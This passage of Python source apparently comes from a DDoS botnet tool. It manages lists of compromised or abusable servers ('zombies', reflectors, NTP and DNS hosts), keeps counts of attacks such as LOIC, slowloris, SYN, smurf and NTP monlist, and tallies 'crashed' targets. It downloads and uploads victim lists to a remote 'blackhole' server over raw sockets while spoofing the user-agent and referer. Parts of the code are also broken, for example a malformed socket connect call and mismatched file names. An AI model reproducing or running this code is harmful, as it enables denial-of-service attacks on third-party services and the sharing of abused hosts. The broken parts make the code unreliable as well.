  1221. if options.upload_github:
  1222. try:
  1223. self.banner()
  1224. print("\n[AI] Uploading 'zombies' to [GitHub] is simple. Follow the next steps:\n")
  1225. print('='*22 + '\n')
  1226. upload_github_list = self.uploading_github_list()
  1227. except Exception as e:
  1228. print(("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n"))
  1229. if DEBUG == True:
  1230. traceback.print_exc()
  1231. return #sys.exit(2)
  1232. # starting new zombie thread
  1233. def connect_zombies(self, zombie):
  1234. z=Zombie(self, zombie)
  1235. t = threading.Thread(target=z.connect, name=zombie)
  1236. t.start()
  1237. # single connection handling
  1238. def connect_zombie(self, zombie):
  1239. z=Zombie(self,zombie)
  1240. return z.connect()
  1241. def extract_proxy(self, proxy):
  1242. sep = ":"
  1243. proxy_ip = proxy.rsplit(sep, 1)[0]
  1244. if proxy_ip.startswith('http://'):
  1245. proxy_ip = proxy_ip.replace('http://', '')
  1246. elif proxy_ip.startswith('https://'):
  1247. proxy_ip = proxy_ip.replace('https://', '')
  1248. if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (privoxy, ...)
  1249. proxy_ip = 'localhost'
  1250. proxy_port = proxy.rsplit(sep, 1)[1]
  1251. proxy_url = proxy_ip + ":" + proxy_port # ex: localhost:8118
  1252. return proxy_url
  1253. def proxy_transport(self, proxy):
  1254. proxy_url = self.extract_proxy(proxy)
  1255. proxy = urllib.request.ProxyHandler({'https': proxy_url})
  1256. opener = urllib.request.build_opener(proxy)
  1257. urllib.request.install_opener(opener)
  1258. def check_mothership_chargo(self):
  1259. f = open(self.zombies_file)
  1260. self.zombies = f.readlines()
  1261. self.zombies = [zombie.replace('\n', '') for zombie in self.zombies]
  1262. self.list_zombies = []
  1263. for zombie in self.zombies:
  1264. t = urlparse(zombie)
  1265. name_zombie = t.netloc
  1266. if name_zombie == "":
  1267. name_zombie = zombie
  1268. self.list_zombies.append(name_zombie)
  1269. self.num_zombies = str(len(self.zombies))
  1270. f.close()
  1271. f = open(self.aliens_file)
  1272. self.aliens = f.readlines()
  1273. self.aliens = [alien.replace('\n', '') for alien in self.aliens]
  1274. self.list_aliens = []
  1275. for alien in self.aliens:
  1276. t = urlparse(alien)
  1277. name_alien = t.netloc
  1278. if name_alien == "":
  1279. name_alien = alien
  1280. self.list_aliens.append(name_alien)
  1281. self.num_aliens = str(len(self.aliens))
  1282. f.close()
  1283. f = open(self.droids_file)
  1284. self.droids = f.readlines()
  1285. self.droids = [droid.replace('\n', '') for droid in self.droids]
  1286. self.list_droids = []
  1287. for droid in self.droids:
  1288. t = urlparse(droid)
  1289. name_droid = t.netloc
  1290. if name_droid == "":
  1291. name_droid = droid
  1292. self.list_droids.append(name_droid)
  1293. self.num_droids = str(len(self.droids))
  1294. f.close()
  1295. f = open(self.ucavs_file)
  1296. self.ucavs = f.readlines()
  1297. self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs]
  1298. self.list_ucavs = []
  1299. for ucav in self.ucavs:
  1300. t = urlparse(ucav)
  1301. name_ucav = t.netloc
  1302. if name_ucav == "":
  1303. name_ucav = ucav
  1304. self.list_ucavs.append(name_ucav)
  1305. self.num_ucavs = str(len(self.ucavs))
  1306. f.close()
  1307. f = open(self.rpcs_file)
  1308. self.rpcs = f.readlines()
  1309. self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs]
  1310. self.list_rpcs = []
  1311. for rpc in self.rpcs:
  1312. t = urlparse(rpc)
  1313. name_rpc = t.netloc
  1314. if name_rpc == "":
  1315. name_rpc = rpc
  1316. self.list_rpcs.append(name_rpc)
  1317. self.num_rpcs = str(len(self.rpcs))
  1318. f.close()
  1319. self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs))
  1320. return self.total_botnet
  1321. def update_flying_stats(self):
  1322. if not os.path.exists(self.mothership_stats_file) == True: # create data when no stats file (first time used)
  1323. with open(self.mothership_stats_file, "w") as f:
  1324. json.dump({"flying": "0", "missions": "0", "scanner": "0", "transferred": "0", "max_chargo": "0", "completed": "0", "loic": "0", "loris": "0", "ufosyn": "0", "spray": "0", "smurf": "0", "xmas": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "crashed": "0"}, f, indent=4) # starting reset
  1325. stats_json_file = open(self.mothership_stats_file, "r")
  1326. data = json.load(stats_json_file)
  1327. stats_json_file.close()
  1328. aflying = data["flying"]
  1329. aflying = str(int(aflying) + 1) # add new flying time
  1330. data["flying"] = aflying
  1331. stats_json_file = open(self.mothership_stats_file, "w+")
  1332. stats_json_file.write(json.dumps(data))
  1333. stats_json_file.close()
  1334. def update_mothership_stats(self):
  1335. stats_json_file = open(self.mothership_stats_file, "r")
  1336. data = json.load(stats_json_file)
  1337. stats_json_file.close()
  1338. acompleted = data["completed"]
  1339. acompleted = str(int(acompleted) + 1) # add new completed attack
  1340. data["completed"] = acompleted
  1341. stats_json_file = open(self.mothership_stats_file, "w+")
  1342. stats_json_file.write(json.dumps(data))
  1343. stats_json_file.close()
  1344. def update_targets_crashed(self):
  1345. stats_json_file = open(self.mothership_stats_file, "r")
  1346. data = json.load(stats_json_file)
  1347. stats_json_file.close()
  1348. tcrashed = data["crashed"]
  1349. tcrashed = str(int(tcrashed) + 1) # add new crashed target
  1350. data["crashed"] = tcrashed
  1351. stats_json_file = open(self.mothership_stats_file, "w+")
  1352. stats_json_file.write(json.dumps(data))
  1353. stats_json_file.close()
  1354. def update_missions_stats(self):
  1355. stats_json_file = open(self.mothership_stats_file, "r")
  1356. data = json.load(stats_json_file)
  1357. stats_json_file.close()
  1358. missions = data["missions"]
  1359. missions = str(int(missions) + 1) # add new mission target
  1360. data["missions"] = missions
  1361. stats_json_file = open(self.mothership_stats_file, "w+")
  1362. stats_json_file.write(json.dumps(data))
  1363. stats_json_file.close()
  1364. def update_scanner_stats(self, num):
  1365. stats_json_file = open(self.mothership_stats_file, "r")
  1366. data = json.load(stats_json_file)
  1367. stats_json_file.close()
  1368. scanner = data["scanner"]
  1369. scanner = str(int(scanner) + int(num)) # add new zombies found by dorking to mothership stats
  1370. data["scanner"] = scanner
  1371. stats_json_file = open(self.mothership_stats_file, "w+")
  1372. stats_json_file.write(json.dumps(data))
  1373. stats_json_file.close()
  1374. def update_transferred_stats(self, num):
  1375. stats_json_file = open(self.mothership_stats_file, "r")
  1376. data = json.load(stats_json_file)
  1377. stats_json_file.close()
  1378. transferred = data["transferred"]
  1379. transferred = str(int(transferred) + int(num)) # add new zombies found by downloading via blackholes to mothership stats
  1380. data["transferred"] = transferred
  1381. stats_json_file = open(self.mothership_stats_file, "w+")
  1382. stats_json_file.write(json.dumps(data))
  1383. stats_json_file.close()
  1384. def update_max_chargo(self, chargo):
  1385. stats_json_file = open(self.mothership_stats_file, "r")
  1386. data = json.load(stats_json_file)
  1387. stats_json_file.close()
  1388. amax_chargo = data["max_chargo"]
  1389. if int(chargo) > int(amax_chargo): # new max chargo found
  1390. amax_chargo = chargo # add new max chargo
  1391. else:
  1392. amax_chargo = data["max_chargo"]
  1393. data["max_chargo"] = amax_chargo
  1394. stats_json_file = open(self.mothership_stats_file, "w+")
  1395. stats_json_file.write(json.dumps(data))
  1396. stats_json_file.close()
  1397. def update_loic_stats(self):
  1398. stats_json_file = open(self.mothership_stats_file, "r")
  1399. data = json.load(stats_json_file)
  1400. stats_json_file.close()
  1401. aloic = data["loic"]
  1402. aloic = str(int(aloic) + 1) # add new loic attack to recorded stats
  1403. self.total_loic = self.total_loic + 1 # add new loic attack to session stats
  1404. data["loic"] = aloic
  1405. stats_json_file = open(self.mothership_stats_file, "w+")
  1406. stats_json_file.write(json.dumps(data))
  1407. stats_json_file.close()
  1408. def update_loris_stats(self):
  1409. stats_json_file = open(self.mothership_stats_file, "r")
  1410. data = json.load(stats_json_file)
  1411. stats_json_file.close()
  1412. aloris = data["loris"]
  1413. aloris = str(int(aloris) + 1) # add new loris attack to recorded stats
  1414. self.total_loris = self.total_loris + 1 # add new loris attack to session stats
  1415. data["loris"] = aloris
  1416. stats_json_file = open(self.mothership_stats_file, "w+")
  1417. stats_json_file.write(json.dumps(data))
  1418. stats_json_file.close()
  1419. def update_ufosyn_stats(self):
  1420. stats_json_file = open(self.mothership_stats_file, "r")
  1421. data = json.load(stats_json_file)
  1422. stats_json_file.close()
  1423. aufosyn = data["ufosyn"]
  1424. aufosyn = str(int(aufosyn) + 1) # add new ufosyn attack to recorded stats
  1425. self.total_syn = self.total_syn + 1 # add new ufosyn attack to session stats
  1426. data["ufosyn"] = aufosyn
  1427. stats_json_file = open(self.mothership_stats_file, "w+")
  1428. stats_json_file.write(json.dumps(data))
  1429. stats_json_file.close()
  1430. def update_spray_stats(self):
  1431. stats_json_file = open(self.mothership_stats_file, "r")
  1432. data = json.load(stats_json_file)
  1433. stats_json_file.close()
  1434. aspray = data["spray"]
  1435. aspray = str(int(aspray) + 1) # add new spray attack to recorded stats
  1436. self.total_spray = self.total_spray + 1 # add new spray attack to session stats
  1437. data["spray"] = aspray
  1438. stats_json_file = open(self.mothership_stats_file, "w+")
  1439. stats_json_file.write(json.dumps(data))
  1440. stats_json_file.close()
  1441. def update_smurf_stats(self):
  1442. stats_json_file = open(self.mothership_stats_file, "r")
  1443. data = json.load(stats_json_file)
  1444. stats_json_file.close()
  1445. asmurf = data["smurf"]
  1446. asmurf = str(int(asmurf) + 1) # add new smurf attack to recorded stats
  1447. self.total_smurf = self.total_smurf + 1 # add new smurf attack to session stats
  1448. data["smurf"] = asmurf
  1449. stats_json_file = open(self.mothership_stats_file, "w+")
  1450. stats_json_file.write(json.dumps(data))
  1451. stats_json_file.close()
  1452. def update_xmas_stats(self):
  1453. stats_json_file = open(self.mothership_stats_file, "r")
  1454. data = json.load(stats_json_file)
  1455. stats_json_file.close()
  1456. axmas = data["xmas"]
  1457. axmas = str(int(axmas) + 1) # add new xmas attack to recorded stats
  1458. self.total_xmas = self.total_xmas + 1 # add new xmas attack to session stats
  1459. data["xmas"] = axmas
  1460. stats_json_file = open(self.mothership_stats_file, "w+")
  1461. stats_json_file.write(json.dumps(data))
  1462. stats_json_file.close()
  1463. def update_nuke_stats(self):
  1464. stats_json_file = open(self.mothership_stats_file, "r")
  1465. data = json.load(stats_json_file)
  1466. stats_json_file.close()
  1467. anuke = data["nuke"]
  1468. anuke = str(int(anuke) + 1) # add new nuke attack to recorded stats
  1469. self.total_nuke = self.total_nuke + 1 # add new nuke attack to session stats
  1470. data["nuke"] = anuke
  1471. stats_json_file = open(self.mothership_stats_file, "w+")
  1472. stats_json_file.write(json.dumps(data))
  1473. stats_json_file.close()
  1474. def update_tachyon_stats(self):
  1475. stats_json_file = open(self.mothership_stats_file, "r")
  1476. data = json.load(stats_json_file)
  1477. stats_json_file.close()
  1478. atachyon = data["tachyon"]
  1479. atachyon = str(int(atachyon) + 1) # add new tachyon attack to recorded stats
  1480. self.total_tachyon = self.total_tachyon + 1 # add new tachyon attack to session stats
  1481. data["tachyon"] = atachyon
  1482. stats_json_file = open(self.mothership_stats_file, "w+")
  1483. stats_json_file.write(json.dumps(data))
  1484. stats_json_file.close()
  1485. def update_monlist_stats(self):
  1486. stats_json_file = open(self.mothership_stats_file, "r")
  1487. data = json.load(stats_json_file)
  1488. stats_json_file.close()
  1489. amonlist = data["monlist"]
  1490. amonlist = str(int(amonlist) + 1) # add new monlist attack to recorded stats
  1491. self.total_monlist = self.total_monlist + 1 # add new monlist attack to session stats
  1492. data["monlist"] = amonlist
  1493. stats_json_file = open(self.mothership_stats_file, "w+")
  1494. stats_json_file.write(json.dumps(data))
  1495. stats_json_file.close()
  1496. def uploading_list(self):
  1497. from io import BytesIO
  1498. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  1499. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  1500. abductions = "botnet/abductions.txt.gz"
  1501. troops = "botnet/troops.txt.gz"
  1502. robots = "botnet/robots.txt.gz"
  1503. drones = "botnet/drones.txt.gz"
  1504. reflectors = "botnet/reflectors.txt.gz"
  1505. crystals = "botnet/crystals.txt.gz"
  1506. warps = "botnet/warps.txt.gz"
  1507. if self.options.timeout: # set timeout
  1508. try:
  1509. timeout = int(self.options.timeout)
  1510. except:
  1511. timeout = 5
  1512. else:
  1513. timeout = 5
  1514. if timeout < 1:
  1515. timeout = 5
  1516. try:
  1517. print("[AI] Checking integrity of [Blackhole]: "+self.blackhole+"\n")
  1518. if self.options.forcessl:
  1519. if self.options.proxy: # set proxy
  1520. self.proxy_transport(options.proxy)
  1521. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
  1522. abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1523. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
  1524. troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1525. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
  1526. robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1527. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
  1528. drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1529. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
  1530. reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1531. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
  1532. crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1533. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
  1534. warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1535. else:
  1536. if self.options.proxy: # set proxy
  1537. self.proxy_transport(options.proxy)
  1538. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
  1539. abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1540. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
  1541. troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1542. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
  1543. robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1544. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
  1545. drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1546. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
  1547. reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1548. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
  1549. crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1550. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
  1551. warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  1552. if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "":
  1553. print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
  1554. print('-'*12 + '\n')
  1555. print("[Error] [AI] Unable to uploading list of [Zombies] to this [Blackhole] [Server] -> [Exiting!]\n")
  1556. return
  1557. print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX READY!] ;-)")
  1558. f_in_abductions = gzip.open(BytesIO(abductions_reply), 'rb')
  1559. f_out_abductions = open('botnet/abductions.txt', 'wb')
  1560. f_out_abductions.write(f_in_abductions.read())
  1561. f_in_abductions.close()
  1562. f_out_abductions.close()
  1563. num_zombies = 0
  1564. with open('botnet/abductions.txt') as f:
  1565. for _ in f:
  1566. num_zombies = num_zombies + 1
  1567. print("\n[Info] [Zombies] on [Blackhole]: "+ str(num_zombies))
  1568. f_in_robots = gzip.open(BytesIO(robots_reply), 'rb')
  1569. f_out_robots = open('botnet/robots.txt', 'wb')
  1570. f_out_robots.write(f_in_robots.read())
  1571. f_in_robots.close()
  1572. f_out_robots.close()
  1573. num_robots = 0
  1574. with open('botnet/robots.txt') as f:
  1575. for _ in f:
  1576. num_robots = num_robots + 1
  1577. print("[Info] [Droids] on [Blackhole] : "+ str(num_robots))
  1578. f_in_troops = gzip.open(BytesIO(troops_reply), 'rb')
  1579. f_out_troops = open('botnet/troops.txt', 'wb')
  1580. f_out_troops.write(f_in_troops.read())
  1581. f_in_troops.close()
  1582. f_out_troops.close()
  1583. num_aliens = 0
  1584. with open('botnet/aliens.txt') as f:
  1585. for _ in f:
  1586. num_aliens = num_aliens + 1
  1587. print("[Info] [Aliens] on [Blackhole] : "+ str(num_aliens))
  1588. f_in_drones = gzip.open(BytesIO(drones_reply), 'rb')
  1589. f_out_drones = open('botnet/drones.txt', 'wb')
  1590. f_out_drones.write(f_in_drones.read())
  1591. f_in_drones.close()
  1592. f_out_drones.close()
  1593. num_drones = 0
  1594. with open('botnet/drones.txt') as f:
  1595. for _ in f:
  1596. num_drones = num_drones + 1
  1597. print("[Info] [UCAVs] on [Blackhole] : "+ str(num_drones))
  1598. f_in_reflectors = gzip.open(BytesIO(reflectors_reply), 'rb')
  1599. f_out_reflectors = open('botnet/reflectors.txt', 'wb')
  1600. f_out_reflectors.write(f_in_reflectors.read())
  1601. f_in_reflectors.close()
  1602. f_out_reflectors.close()
  1603. num_reflectors = 0
  1604. with open('botnet/reflectors.txt') as f:
  1605. for _ in f:
  1606. num_reflectors = num_reflectors + 1
  1607. print("[Info] [X-RPCs] on [Blackhole] : "+ str(num_reflectors))
  1608. f_in_crystals = gzip.open(BytesIO(crystals_reply), 'rb')
  1609. f_out_crystals = open('botnet/crystals.txt', 'wb')
  1610. f_out_crystals.write(f_in_crystals.read())
  1611. f_in_crystals.close()
  1612. f_out_crystals.close()
  1613. num_crystals = 0
  1614. with open('botnet/crystals.txt') as f:
  1615. for _ in f:
  1616. num_crystals = num_crystals + 1
  1617. print("[Info] [NTPs] on [Blackhole] : "+ str(num_crystals))
  1618. f_in_warps = gzip.open(BytesIO(warps_reply), 'rb')
  1619. f_out_warps = open('botnet/warps.txt', 'wb')
  1620. f_out_warps.write(f_in_warps.read())
  1621. f_in_warps.close()
  1622. f_out_warps.close()
  1623. num_warps = 0
  1624. with open('botnet/warps.txt') as f:
  1625. for _ in f:
  1626. num_warps = num_warps + 1
  1627. print("[Info] [DNSs] on [Blackhole] : "+ str(num_warps))
  1628. print('-'*12 + '\n')
  1629. if not self.options.forceyes:
  1630. update_reply = input("[AI] Do you want to merge ONLY the new [Zombies] into [Blackhole]? (Y/n)")
  1631. print('-'*25)
  1632. else:
  1633. update_reply = "Y"
  1634. if update_reply == "n" or update_reply == "N":
  1635. os.remove('botnet/abductions.txt') # remove abductions file
  1636. os.remove('botnet/troops.txt') # remove troops file
  1637. os.remove('botnet/robots.txt') # remove robots file
  1638. os.remove('botnet/drones.txt') # remove drones file
  1639. os.remove('botnet/reflectors.txt') # remove reflectors file
  1640. os.remove('botnet/crystals.txt') # remove crystals file
  1641. os.remove('botnet/warps.txt') # remove warps file
  1642. print("\n[Info] [AI] [Control] Aborting uploading process and cleaning temporal files... -> [Exiting!]\n")
  1643. return
  1644. else:
  1645. print("\n[AI] Checking integrity of your list of [Zombies] -> [OK!]\n") # only upload valid zombies
  1646. print('='*35)
  1647. zombies = self.extract_zombies()
  1648. if not zombies:
  1649. return
  1650. test = self.testing(zombies)
  1651. zombies_community = []
  1652. zombies_added = 0
  1653. f = open('botnet/abductions.txt')
  1654. abductions = f.readlines()
  1655. abductions = [abduction.strip() for abduction in abductions]
  1656. f.close()
  1657. fz = open(self.zombies_file)
  1658. zombies = fz.readlines()
  1659. zombies = [zombie.strip() for zombie in zombies]
  1660. fz.close()
  1661. for zombie in zombies:
  1662. if zombie not in abductions:
  1663. zombies_community.append(zombie)
  1664. zombies_added = zombies_added + 1
  1665. else:
  1666. pass
  1667. print("[Info] [AI] New [Zombies] found: " + str(zombies_added))
  1668. aliens = self.extract_aliens()
  1669. if not aliens:
  1670. return
  1671. aliens_community = []
  1672. aliens_added = 0
  1673. f = open('botnet/troops.txt')
  1674. troops = f.readlines()
  1675. troops = [troop.strip() for troop in troops]
  1676. f.close()
  1677. fz = open(self.aliens_file)
  1678. aliens = fz.readlines()
  1679. aliens = [alien.strip() for alien in aliens]
  1680. fz.close()
  1681. for alien in aliens:
  1682. if alien not in troops:
  1683. aliens_community.append(alien)
  1684. aliens_added = aliens_added + 1
  1685. else:
  1686. pass
  1687. print("[Info] [AI] New [Aliens] found : " + str(aliens_added))
  1688. droids = self.extract_droids()
  1689. if not droids:
  1690. return
  1691. droids_community = []
  1692. droids_added = 0
  1693. f = open('botnet/robots.txt')
  1694. robots = f.readlines()
  1695. robots = [robot.strip() for robot in robots]
  1696. f.close()
  1697. fz = open(self.droids_file)
  1698. droids = fz.readlines()
  1699. droids = [droid.strip() for droid in droids]
  1700. fz.close()
  1701. for droid in droids:
  1702. if droid not in robots:
  1703. droids_community.append(droid)
  1704. droids_added = droids_added + 1
  1705. else:
  1706. pass
  1707. print("[Info] [AI] New [Droids] found : " + str(droids_added))
  1708. ucavs = self.extract_ucavs()
  1709. if not ucavs:
  1710. return
  1711. ucavs_community = []
  1712. ucavs_added = 0
  1713. f = open('botnet/drones.txt')
  1714. drones = f.readlines()
  1715. drones = [drone.strip() for drone in drones]
  1716. f.close()
  1717. fz = open(self.ucavs_file)
  1718. ucavs = fz.readlines()
  1719. ucavs = [ucav.strip() for ucav in ucavs]
  1720. fz.close()
  1721. for ucav in ucavs:
  1722. if ucav not in drones:
  1723. ucavs_community.append(ucav)
  1724. ucavs_added = ucavs_added + 1
  1725. else:
  1726. pass
  1727. print("[Info] [AI] New [UCAVs] found : " + str(ucavs_added))
  1728. rpcs = self.extract_rpcs()
  1729. if not rpcs:
  1730. return
  1731. rpcs_community = []
  1732. rpcs_added = 0
  1733. f = open('botnet/reflectors.txt')
  1734. reflectors = f.readlines()
  1735. reflectors = [reflector.strip() for reflector in reflectors]
  1736. f.close()
  1737. fz = open(self.rpcs_file)
  1738. rpcs = fz.readlines()
  1739. rpcs = [rpc.strip() for rpc in rpcs]
  1740. fz.close()
  1741. for rpc in rpcs:
  1742. if rpc not in reflectors:
  1743. rpcs_community.append(rpc)
  1744. rpcs_added = rpcs_added + 1
  1745. else:
  1746. pass
  1747. print("[Info] [AI] New [X-RPCs] found : " + str(rpcs_added))
  1748. ntps = self.extract_ntps()
  1749. if not ntps:
  1750. return
  1751. ntps_community = []
  1752. ntps_added = 0
  1753. f = open('botnet/crystals.txt')
  1754. crystals = f.readlines()
  1755. crystals = [crystal.strip() for crystal in crystals]
  1756. f.close()
  1757. fz = open(self.ntps_file)
  1758. ntps = fz.readlines()
  1759. ntps = [ntp.strip() for ntp in ntps]
  1760. fz.close()
  1761. for ntp in ntps:
  1762. if ntp not in crystals:
  1763. ntps_community.append(ntp)
  1764. ntps_added = ntps_added + 1
  1765. else:
  1766. pass
  1767. print("[Info] [AI] New [NTPs] found : " + str(ntps_added))
  1768. dnss = self.extract_dnss()
  1769. if not dnss:
  1770. return
  1771. dnss_community = []
  1772. dnss_added = 0
  1773. f = open('botnet/warps.txt')
  1774. warps = f.readlines()
  1775. warps = [warp.strip() for warp in warps]
  1776. f.close()
  1777. fz = open(self.dnss_file)
  1778. dnss = fz.readlines()
  1779. dnss = [dns.strip() for dns in dnss]
  1780. fz.close()
  1781. for dns in dnss:
  1782. if dns not in warps:
  1783. dnss_community.append(dns)
  1784. dnss_added = dnss_added + 1
  1785. else:
  1786. pass
  1787. print("[Info] [AI] New [DNSs] found : " + str(dnss_added))
  1788. print('-'*12 + '\n')
  1789. if zombies_added == 0 and aliens_added == 0 and droids_added == 0 and ucavs_added == 0 and rpcs_added == 0 and ntps_added == 0 and dnss_added == 0: # not any zombie
  1790. os.remove('botnet/abductions.txt') # remove abductions file
  1791. os.remove('botnet/troops.txt') # remove troops file
  1792. os.remove('botnet/robots.txt') # remove robots file
  1793. os.remove('botnet/drones.txt') # remove ucavs file
  1794. os.remove('botnet/reflectors.txt') # remove rpcs file
  1795. os.remove('botnet/crystals.txt') # remove crystals file
  1796. os.remove('botnet/warps.txt') # remove warps file
  1797. print("[Info] [AI] Try to search for new [Zombies]. These are already in this [Blackhole] -> [Exiting!]\n")
  1798. return
  1799. else:
  1800. fc = gzip.open('botnet/community_zombies.txt.gz', 'wb')
  1801. for zombie in zombies_community:
  1802. fc.write(zombie.strip()+"\n")
  1803. fc.close()
  1804. os.remove('botnet/abductions.txt') # remove abductions file
  1805. fc = gzip.open('botnet/community_aliens.txt.gz', 'wb')
  1806. for alien in aliens_community:
  1807. fc.write(alien.strip()+"\n")
  1808. fc.close()
  1809. os.remove('botnet/troops.txt') # remove troops file
  1810. fc = gzip.open('botnet/community_droids.txt.gz', 'wb')
  1811. for droid in droids_community:
  1812. fc.write(droid.strip()+"\n")
  1813. fc.close()
  1814. os.remove('botnet/robots.txt') # remove robots file
  1815. fc = gzip.open('botnet/community_ucavs.txt.gz', 'wb')
  1816. for ucav in ucavs_community:
  1817. fc.write(ucav.strip()+"\n")
  1818. fc.close()
  1819. os.remove('botnet/drones.txt') # remove drones file
  1820. fc = gzip.open('botnet/community_rpcs.txt.gz', 'wb')
  1821. for rpc in rpcs_community:
  1822. fc.write(rpc.strip()+"\n")
  1823. fc.close()
  1824. os.remove('botnet/reflectors.txt') # remove reflectors file
  1825. fc = gzip.open('botnet/community_ntps.txt.gz', 'wb')
  1826. for ntp in ntps_community:
  1827. fc.write(ntp.strip()+"\n")
  1828. fc.close()
  1829. os.remove('botnet/crystals.txt') # remove crystals file
  1830. fc = gzip.open('botnet/community_dnss.txt.gz', 'wb')
  1831. for dns in dnss_community:
  1832. fc.write(dns.strip()+"\n")
  1833. fc.close()
  1834. os.remove('botnet/warps.txt') # remove warps file
  1835. print("[Info] [AI] Starting to upload new [Zombies]...\n")
  1836. try: # open a socket and send data to the blackhole reciever port
  1837. host = self.blackhole
  1838. cport = 9991
  1839. mport = 9990
  1840. try:
  1841. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data
  1842. cs.connect(host, cport)
  1843. cs.send("SEND " + 'community_zombies.txt.gz')
  1844. cs.close()
  1845. f = open('botnet/community_zombies.txt.gz', "rb")
  1846. data = f.read()
  1847. f.close()
  1848. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1849. ms.connect(host, mport)
  1850. ms.send(data)
  1851. ms.close()
  1852. os.remove('botnet/community_zombies.txt.gz') # remove local zombies .gz file after transfer
  1853. time.sleep(1)
  1854. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1855. cs.connect(host, cport)
  1856. cs.send("SEND " + 'community_aliens.txt.gz')
  1857. cs.close()
  1858. f = open('botnet/community_aliens.txt.gz', "rb")
  1859. data = f.read()
  1860. f.close()
  1861. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1862. ms.connect(host, mport)
  1863. ms.send(data)
  1864. ms.close()
  1865. os.remove('botnet/community_aliens.txt.gz') # remove local aliens .gz file after transfer
  1866. time.sleep(1)
  1867. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1868. cs.connect(host, cport)
  1869. cs.send("SEND " + 'community_robots.txt.gz')
  1870. cs.close()
  1871. f = open('botnet/community_droids.txt.gz', "rb")
  1872. data = f.read()
  1873. f.close()
  1874. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1875. ms.connect(host, mport)
  1876. ms.send(data)
  1877. ms.close()
  1878. os.remove('botnet/community_droids.txt.gz') # remove local droids .gz file after transfer
  1879. time.sleep(1)
  1880. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1881. cs.connect(host, cport)
  1882. cs.send("SEND " + 'community_ucavs.txt.gz')
  1883. cs.close()
  1884. f = open('botnet/community_ucavs.txt.gz', "rb")
  1885. data = f.read()
  1886. f.close()
  1887. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1888. ms.connect(host, mport)
  1889. ms.send(data)
  1890. ms.close()
  1891. os.remove('botnet/community_ucavs.txt.gz') # remove local ucavs .gz file after transfer
  1892. time.sleep(1)
  1893. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
  1894. cs.connect(host, cport)
  1895. cs.send("SEND " + 'community_rpcs.txt.gz')
  1896. cs.close()
  1897. f = open('botnet/community_rpcs.txt.gz', "rb")
  1898. data = f.read()
  1899. f.close()
  1900. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1901. ms.connect(host, mport)
  1902. ms.send(data)
  1903. ms.close()
  1904. os.remove('botnet/community_rpcs.txt.gz') # remove local rpcs .gz file after transfer
  1905. time.sleep(1)
  1906. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
  1907. cs.connect(host, cport)
  1908. cs.send("SEND " + 'community_ntps.txt.gz')
  1909. cs.close()
  1910. f = open('botnet/community_ntps.txt.gz', "rb")
  1911. data = f.read()
  1912. f.close()
  1913. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1914. ms.connect(host, mport)
  1915. ms.send(data)
  1916. ms.close()
  1917. os.remove('botnet/community_ntps.txt.gz') # remove local ntps .gz file after transfer
  1918. time.sleep(1)
